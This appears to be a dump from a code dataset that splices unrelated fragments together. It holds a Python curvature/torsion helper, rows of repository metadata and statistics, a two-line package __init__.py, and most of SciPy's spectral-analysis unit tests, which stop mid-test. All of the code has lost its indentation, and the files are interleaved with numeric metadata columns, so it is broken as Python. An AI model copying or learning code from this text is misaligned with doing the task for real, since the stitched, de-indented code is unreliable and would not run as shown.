def pfit2(fth,t):
nf=len(fth)
o=nf-1
L=t
A=fth
# for a in A:
# print a
#for each points
D1,D2,D3=[],[],[]
kapa,tora=[],[]
crds=[]
for r in xrange(L):
#each point has xyz coordindates
d1,d2,d3=[],[],[]
crd=[]
t=r+1
for i in range(3):
# for j in range(3):
ca=A[i]
# print ca
d1.append(ca[1]+ca[2]*t*2)
d2.append(ca[2]*2)
d3.append(0.)
crd.append(ca[0]+ca[1]*t+ca[2]*t**2)
D1.append(d1)
D2.append(d2)
D3.append(d3)
# print crd
# print d1
dcf=[]
kap=curv(d1,d2)
tor=tors(d1,d2,d3)
kapa.append(kap)
tora.append(tor)
# print 'cur'
# for a in kapa:
# print a
# print 'tor'
# for a in tora:
# print a
return([kapa,tora])
| 17.586667
| 77
| 0.5163
| 504
| 2,638
| 2.702381
| 0.132937
| 0.044053
| 0.039648
| 0.044053
| 0.844347
| 0.812041
| 0.812041
| 0.812041
| 0.812041
| 0.787078
| 0
| 0.080755
| 0.277104
| 2,638
| 149
| 78
| 17.704698
| 0.633456
| 0.286581
| 0
| 0.795181
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036145
| false
| 0
| 0.024096
| 0
| 0.060241
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5843ede99ec5d1d77fd161b833769d92a95511d0
| 44
|
py
|
Python
|
pimux/__init__.py
|
azwyane/pymux
|
09fafc8c313a2c091efed6e9864a0273fe4c35c6
|
[
"MIT"
] | 30
|
2020-05-02T09:21:23.000Z
|
2022-03-24T12:59:09.000Z
|
pimux/__init__.py
|
azwyane/pymux
|
09fafc8c313a2c091efed6e9864a0273fe4c35c6
|
[
"MIT"
] | null | null | null |
pimux/__init__.py
|
azwyane/pymux
|
09fafc8c313a2c091efed6e9864a0273fe4c35c6
|
[
"MIT"
] | 9
|
2020-05-03T19:13:12.000Z
|
2021-03-08T07:21:59.000Z
|
from . import function
from . import Sensors
| 22
| 22
| 0.795455
| 6
| 44
| 5.833333
| 0.666667
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 44
| 2
| 23
| 22
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
58876b6dd481253122151eeb628995760aee43cb
| 31,200
|
py
|
Python
|
scipy/signal/tests/test_spectral.py
|
xu-hong-/scipy
|
f737001cf0a75654efe09a1de5cdf5d1895bda59
|
[
"BSD-3-Clause"
] | 6,989
|
2017-07-18T06:23:18.000Z
|
2022-03-31T15:58:36.000Z
|
scipy/signal/tests/test_spectral.py
|
xu-hong-/scipy
|
f737001cf0a75654efe09a1de5cdf5d1895bda59
|
[
"BSD-3-Clause"
] | 1,978
|
2017-07-18T09:17:58.000Z
|
2022-03-31T14:28:43.000Z
|
scipy/signal/tests/test_spectral.py
|
xu-hong-/scipy
|
f737001cf0a75654efe09a1de5cdf5d1895bda59
|
[
"BSD-3-Clause"
] | 1,228
|
2017-07-18T09:03:13.000Z
|
2022-03-29T05:57:40.000Z
|
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from numpy.testing import assert_raises, assert_approx_equal, \
assert_, run_module_suite, TestCase,\
assert_allclose, assert_array_equal,\
assert_array_almost_equal_nulp, dec
from scipy import signal, fftpack
from scipy._lib._version import NumpyVersion
from scipy.signal import (periodogram, welch, lombscargle, csd, coherence,
spectrogram)
class TestPeriodogram(TestCase):
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_real_onesided_odd(self):
x = np.zeros(15)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8)
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-15)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(16, 1.0))
q = np.ones(16)/16.0
q[0] = 0
assert_allclose(p, q)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, scaling='spectrum')
g, q = periodogram(x, scaling='density')
assert_allclose(f, np.linspace(0, 0.5, 9))
assert_allclose(p, q/16.0)
def test_integer_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_integer_odd(self):
x = np.zeros(15, dtype=int)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8)
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-15)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(16, 1.0))
q = np.ones(16)/16.0
q[0] = 0
assert_allclose(p, q)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
f, p = periodogram(x)
assert_allclose(f, fftpack.fftfreq(16, 1.0))
q = 5.0*np.ones(16)/16.0
q[0] = 0
assert_allclose(p, q)
def test_unk_scaling(self):
assert_raises(ValueError, periodogram, np.zeros(4, np.complex128),
scaling='foo')
def test_nd_axis_m1(self):
x = np.zeros(20, dtype=np.float64)
x = x.reshape((2,1,10))
x[:,:,0] = 1.0
f, p = periodogram(x)
assert_array_equal(p.shape, (2, 1, 6))
assert_array_almost_equal_nulp(p[0,0,:], p[1,0,:], 60)
f0, p0 = periodogram(x[0,0,:])
assert_array_almost_equal_nulp(p0[np.newaxis,:], p[1,:], 60)
def test_nd_axis_0(self):
x = np.zeros(20, dtype=np.float64)
x = x.reshape((10,2,1))
x[0,:,:] = 1.0
f, p = periodogram(x, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_array_almost_equal_nulp(p[:,0,0], p[:,1,0], 60)
f0, p0 = periodogram(x[:,0,0])
assert_array_almost_equal_nulp(p0, p[:,1,0])
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, 10, 'hann')
win = signal.get_window('hann', 16)
fe, pe = periodogram(x, 10, win)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
def test_padded_fft(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x)
fp, pp = periodogram(x, nfft=32)
assert_allclose(f, fp[::2])
assert_allclose(p, pp[::2])
assert_array_equal(pp.shape, (17,))
def test_empty_input(self):
f, p = periodogram([])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = periodogram(np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = periodogram(np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_short_nfft(self):
x = np.zeros(18)
x[0] = 1
f, p = periodogram(x, nfft=16)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_nfft_is_xshape(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, nfft=16)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9, 'f')
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(15, 'f')
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8, 'f')
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-7)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(16, 1.0))
q = np.ones(16, 'f')/16.0
q[0] = 0
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
f, p = periodogram(x)
assert_allclose(f, fftpack.fftfreq(16, 1.0))
q = 5.0*np.ones(16, 'f')/16.0
q[0] = 0
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
class TestWelch(TestCase):
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_onesided_odd(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, scaling='spectrum')
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.015625, 0.02864583, 0.04166667, 0.04166667,
0.02083333])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_odd(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = welch(x, nperseg=8)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.41666667, 0.38194444, 0.55555556, 0.55555556,
0.55555556, 0.55555556, 0.55555556, 0.38194444])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_unk_scaling(self):
assert_raises(ValueError, welch, np.zeros(4, np.complex128),
scaling='foo', nperseg=4)
def test_detrend_linear(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = welch(x, nperseg=10, detrend='linear')
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_no_detrending(self):
x = np.arange(10, dtype=np.float64) + 0.04
f1, p1 = welch(x, nperseg=10, detrend=False)
f2, p2 = welch(x, nperseg=10, detrend=lambda x: x)
assert_allclose(f1, f2, atol=1e-15)
assert_allclose(p1, p2, atol=1e-15)
def test_detrend_external(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = welch(x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_m1(self):
x = np.arange(40, dtype=np.float64) + 0.04
x = x.reshape((2,2,10))
f, p = welch(x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
x = np.rollaxis(x, 2, 0)
f, p = welch(x, nperseg=10, axis=0,
detrend=lambda seg: signal.detrend(seg, axis=0, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_nd_axis_m1(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
f, p = welch(x, nperseg=10)
assert_array_equal(p.shape, (2, 1, 6))
assert_allclose(p[0,0,:], p[1,0,:], atol=1e-13, rtol=1e-13)
f0, p0 = welch(x[0,0,:], nperseg=10)
assert_allclose(p0[np.newaxis,:], p[1,:], atol=1e-13, rtol=1e-13)
def test_nd_axis_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((10,2,1))
f, p = welch(x, nperseg=10, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_allclose(p[:,0,0], p[:,1,0], atol=1e-13, rtol=1e-13)
f0, p0 = welch(x[:,0,0], nperseg=10)
assert_allclose(p0, p[:,1,0], atol=1e-13, rtol=1e-13)
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, 10, 'hann', 8)
win = signal.get_window('hann', 8)
fe, pe = welch(x, 10, win, 8)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
def test_empty_input(self):
f, p = welch([])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = welch(np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = welch(np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_short_data(self):
x = np.zeros(8)
x[0] = 1
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
f, p = welch(x)
f1, p1 = welch(x, nperseg=8)
assert_allclose(f, f1)
assert_allclose(p, p1)
def test_window_long_or_nd(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
assert_raises(ValueError, welch, np.zeros(4), 1,
np.array([1,1,1,1,1]))
assert_raises(ValueError, welch, np.zeros(4), 1,
np.arange(6).reshape((2,3)))
def test_nondefault_noverlap(self):
x = np.zeros(64)
x[::8] = 1
f, p = welch(x, nperseg=16, noverlap=4)
q = np.array([0, 1./12., 1./3., 1./5., 1./3., 1./5., 1./3., 1./5.,
1./6.])
assert_allclose(p, q, atol=1e-12)
def test_bad_noverlap(self):
assert_raises(ValueError, welch, np.zeros(4), 1, 'hann', 2, 7)
def test_nfft_too_short(self):
assert_raises(ValueError, welch, np.ones(12), nfft=3, nperseg=4)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.11111111,
0.07638889], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = welch(x, nperseg=8)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.41666666, 0.38194442, 0.55555552, 0.55555552,
0.55555558, 0.55555552, 0.55555552, 0.38194442], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype,
'dtype mismatch, %s, %s' % (p.dtype, q.dtype))
def test_padded_freqs(self):
x = np.zeros(12)
nfft = 24
f = fftpack.fftfreq(nfft, 1.0)[:nfft//2+1]
f[-1] *= -1
fodd, _ = welch(x, nperseg=5, nfft=nfft)
feven, _ = welch(x, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
nfft = 25
f = fftpack.fftfreq(nfft, 1.0)[:(nfft + 1)//2]
fodd, _ = welch(x, nperseg=5, nfft=nfft)
feven, _ = welch(x, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
class TestCSD:
def test_pad_shorter_x(self):
x = np.zeros(8)
y = np.zeros(12)
f = np.linspace(0, 0.5, 7)
c = np.zeros(7,dtype=np.complex128)
f1, c1 = csd(x, y, nperseg=12)
assert_allclose(f, f1)
assert_allclose(c, c1)
def test_pad_shorter_y(self):
x = np.zeros(12)
y = np.zeros(8)
f = np.linspace(0, 0.5, 7)
c = np.zeros(7,dtype=np.complex128)
f1, c1 = csd(x, y, nperseg=12)
assert_allclose(f, f1)
assert_allclose(c, c1)
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_onesided_odd(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, scaling='spectrum')
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.015625, 0.02864583, 0.04166667, 0.04166667,
0.02083333])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_odd(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = csd(x, x, nperseg=8)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.41666667, 0.38194444, 0.55555556, 0.55555556,
0.55555556, 0.55555556, 0.55555556, 0.38194444])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_unk_scaling(self):
assert_raises(ValueError, csd, np.zeros(4, np.complex128),
np.ones(4, np.complex128), scaling='foo', nperseg=4)
def test_detrend_linear(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = csd(x, x, nperseg=10, detrend='linear')
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_no_detrending(self):
x = np.arange(10, dtype=np.float64) + 0.04
f1, p1 = csd(x, x, nperseg=10, detrend=False)
f2, p2 = csd(x, x, nperseg=10, detrend=lambda x: x)
assert_allclose(f1, f2, atol=1e-15)
assert_allclose(p1, p2, atol=1e-15)
def test_detrend_external(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = csd(x, x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_m1(self):
x = np.arange(40, dtype=np.float64) + 0.04
x = x.reshape((2,2,10))
f, p = csd(x, x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
x = np.rollaxis(x, 2, 0)
f, p = csd(x, x, nperseg=10, axis=0,
detrend=lambda seg: signal.detrend(seg, axis=0, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_nd_axis_m1(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
f, p = csd(x, x, nperseg=10)
assert_array_equal(p.shape, (2, 1, 6))
assert_allclose(p[0,0,:], p[1,0,:], atol=1e-13, rtol=1e-13)
f0, p0 = csd(x[0,0,:], x[0,0,:], nperseg=10)
assert_allclose(p0[np.newaxis,:], p[1,:], atol=1e-13, rtol=1e-13)
def test_nd_axis_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((10,2,1))
f, p = csd(x, x, nperseg=10, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_allclose(p[:,0,0], p[:,1,0], atol=1e-13, rtol=1e-13)
f0, p0 = csd(x[:,0,0], x[:,0,0], nperseg=10)
assert_allclose(p0, p[:,1,0], atol=1e-13, rtol=1e-13)
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, 10, 'hann', 8)
win = signal.get_window('hann', 8)
fe, pe = csd(x, x, 10, win, 8)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
def test_empty_input(self):
f, p = csd([],np.zeros(10))
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
f, p = csd(np.zeros(10),[])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = csd(np.empty(shape), np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
f, p = csd(np.ones(10), np.empty((5,0)))
assert_array_equal(f.shape, (5,0))
assert_array_equal(p.shape, (5,0))
f, p = csd(np.empty((5,0)), np.ones(10))
assert_array_equal(f.shape, (5,0))
assert_array_equal(p.shape, (5,0))
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = csd(np.empty(shape), np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
f, p = csd(np.empty((10,10,3)), np.zeros((10,0,1)), axis=1)
assert_array_equal(f.shape, (10,0,3))
assert_array_equal(p.shape, (10,0,3))
f, p = csd(np.empty((10,0,1)), np.zeros((10,10,3)), axis=1)
assert_array_equal(f.shape, (10,0,3))
assert_array_equal(p.shape, (10,0,3))
def test_short_data(self):
x = np.zeros(8)
x[0] = 1
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
f, p = csd(x, x)
f1, p1 = csd(x, x, nperseg=8)
assert_allclose(f, f1)
assert_allclose(p, p1)
def test_window_long_or_nd(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1,
np.array([1,1,1,1,1]))
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1,
np.arange(6).reshape((2,3)))
def test_nondefault_noverlap(self):
x = np.zeros(64)
x[::8] = 1
f, p = csd(x, x, nperseg=16, noverlap=4)
q = np.array([0, 1./12., 1./3., 1./5., 1./3., 1./5., 1./3., 1./5.,
1./6.])
assert_allclose(p, q, atol=1e-12)
def test_bad_noverlap(self):
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1, 'hann',
2, 7)
def test_nfft_too_short(self):
assert_raises(ValueError, csd, np.ones(12), np.zeros(12), nfft=3,
nperseg=4)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.11111111,
0.07638889], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = csd(x, x, nperseg=8)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.41666666, 0.38194442, 0.55555552, 0.55555552,
0.55555558, 0.55555552, 0.55555552, 0.38194442], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype,
'dtype mismatch, %s, %s' % (p.dtype, q.dtype))
def test_padded_freqs(self):
x = np.zeros(12)
y = np.ones(12)
nfft = 24
f = fftpack.fftfreq(nfft, 1.0)[:nfft//2+1]
f[-1] *= -1
fodd, _ = csd(x, y, nperseg=5, nfft=nfft)
feven, _ = csd(x, y, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
nfft = 25
f = fftpack.fftfreq(nfft, 1.0)[:(nfft + 1)//2]
fodd, _ = csd(x, y, nperseg=5, nfft=nfft)
feven, _ = csd(x, y, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
class TestCoherence:
def test_identical_input(self):
x = np.random.randn(20)
y = np.copy(x) # So `y is x` -> False
f = np.linspace(0, 0.5, 6)
C = np.ones(6)
f1, C1 = coherence(x, y, nperseg=10)
assert_allclose(f, f1)
assert_allclose(C, C1)
def test_phase_shifted_input(self):
x = np.random.randn(20)
y = -x
f = np.linspace(0, 0.5, 6)
C = np.ones(6)
f1, C1 = coherence(x, y, nperseg=10)
assert_allclose(f, f1)
assert_allclose(C, C1)
class TestSpectrogram:
def test_average_all_segments(self):
x = np.random.randn(1024)
fs = 1.0
window = ('tukey', 0.25)
nperseg = 16
noverlap = 2
f, _, P = spectrogram(x, fs, window, nperseg, noverlap)
fw, Pw = welch(x, fs, window, nperseg, noverlap)
assert_allclose(f, fw)
assert_allclose(np.mean(P, axis=-1), Pw)
class TestLombscargle:
def test_frequency(self):
"""Test if frequency location of peak corresponds to frequency of
generated input signal.
"""
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
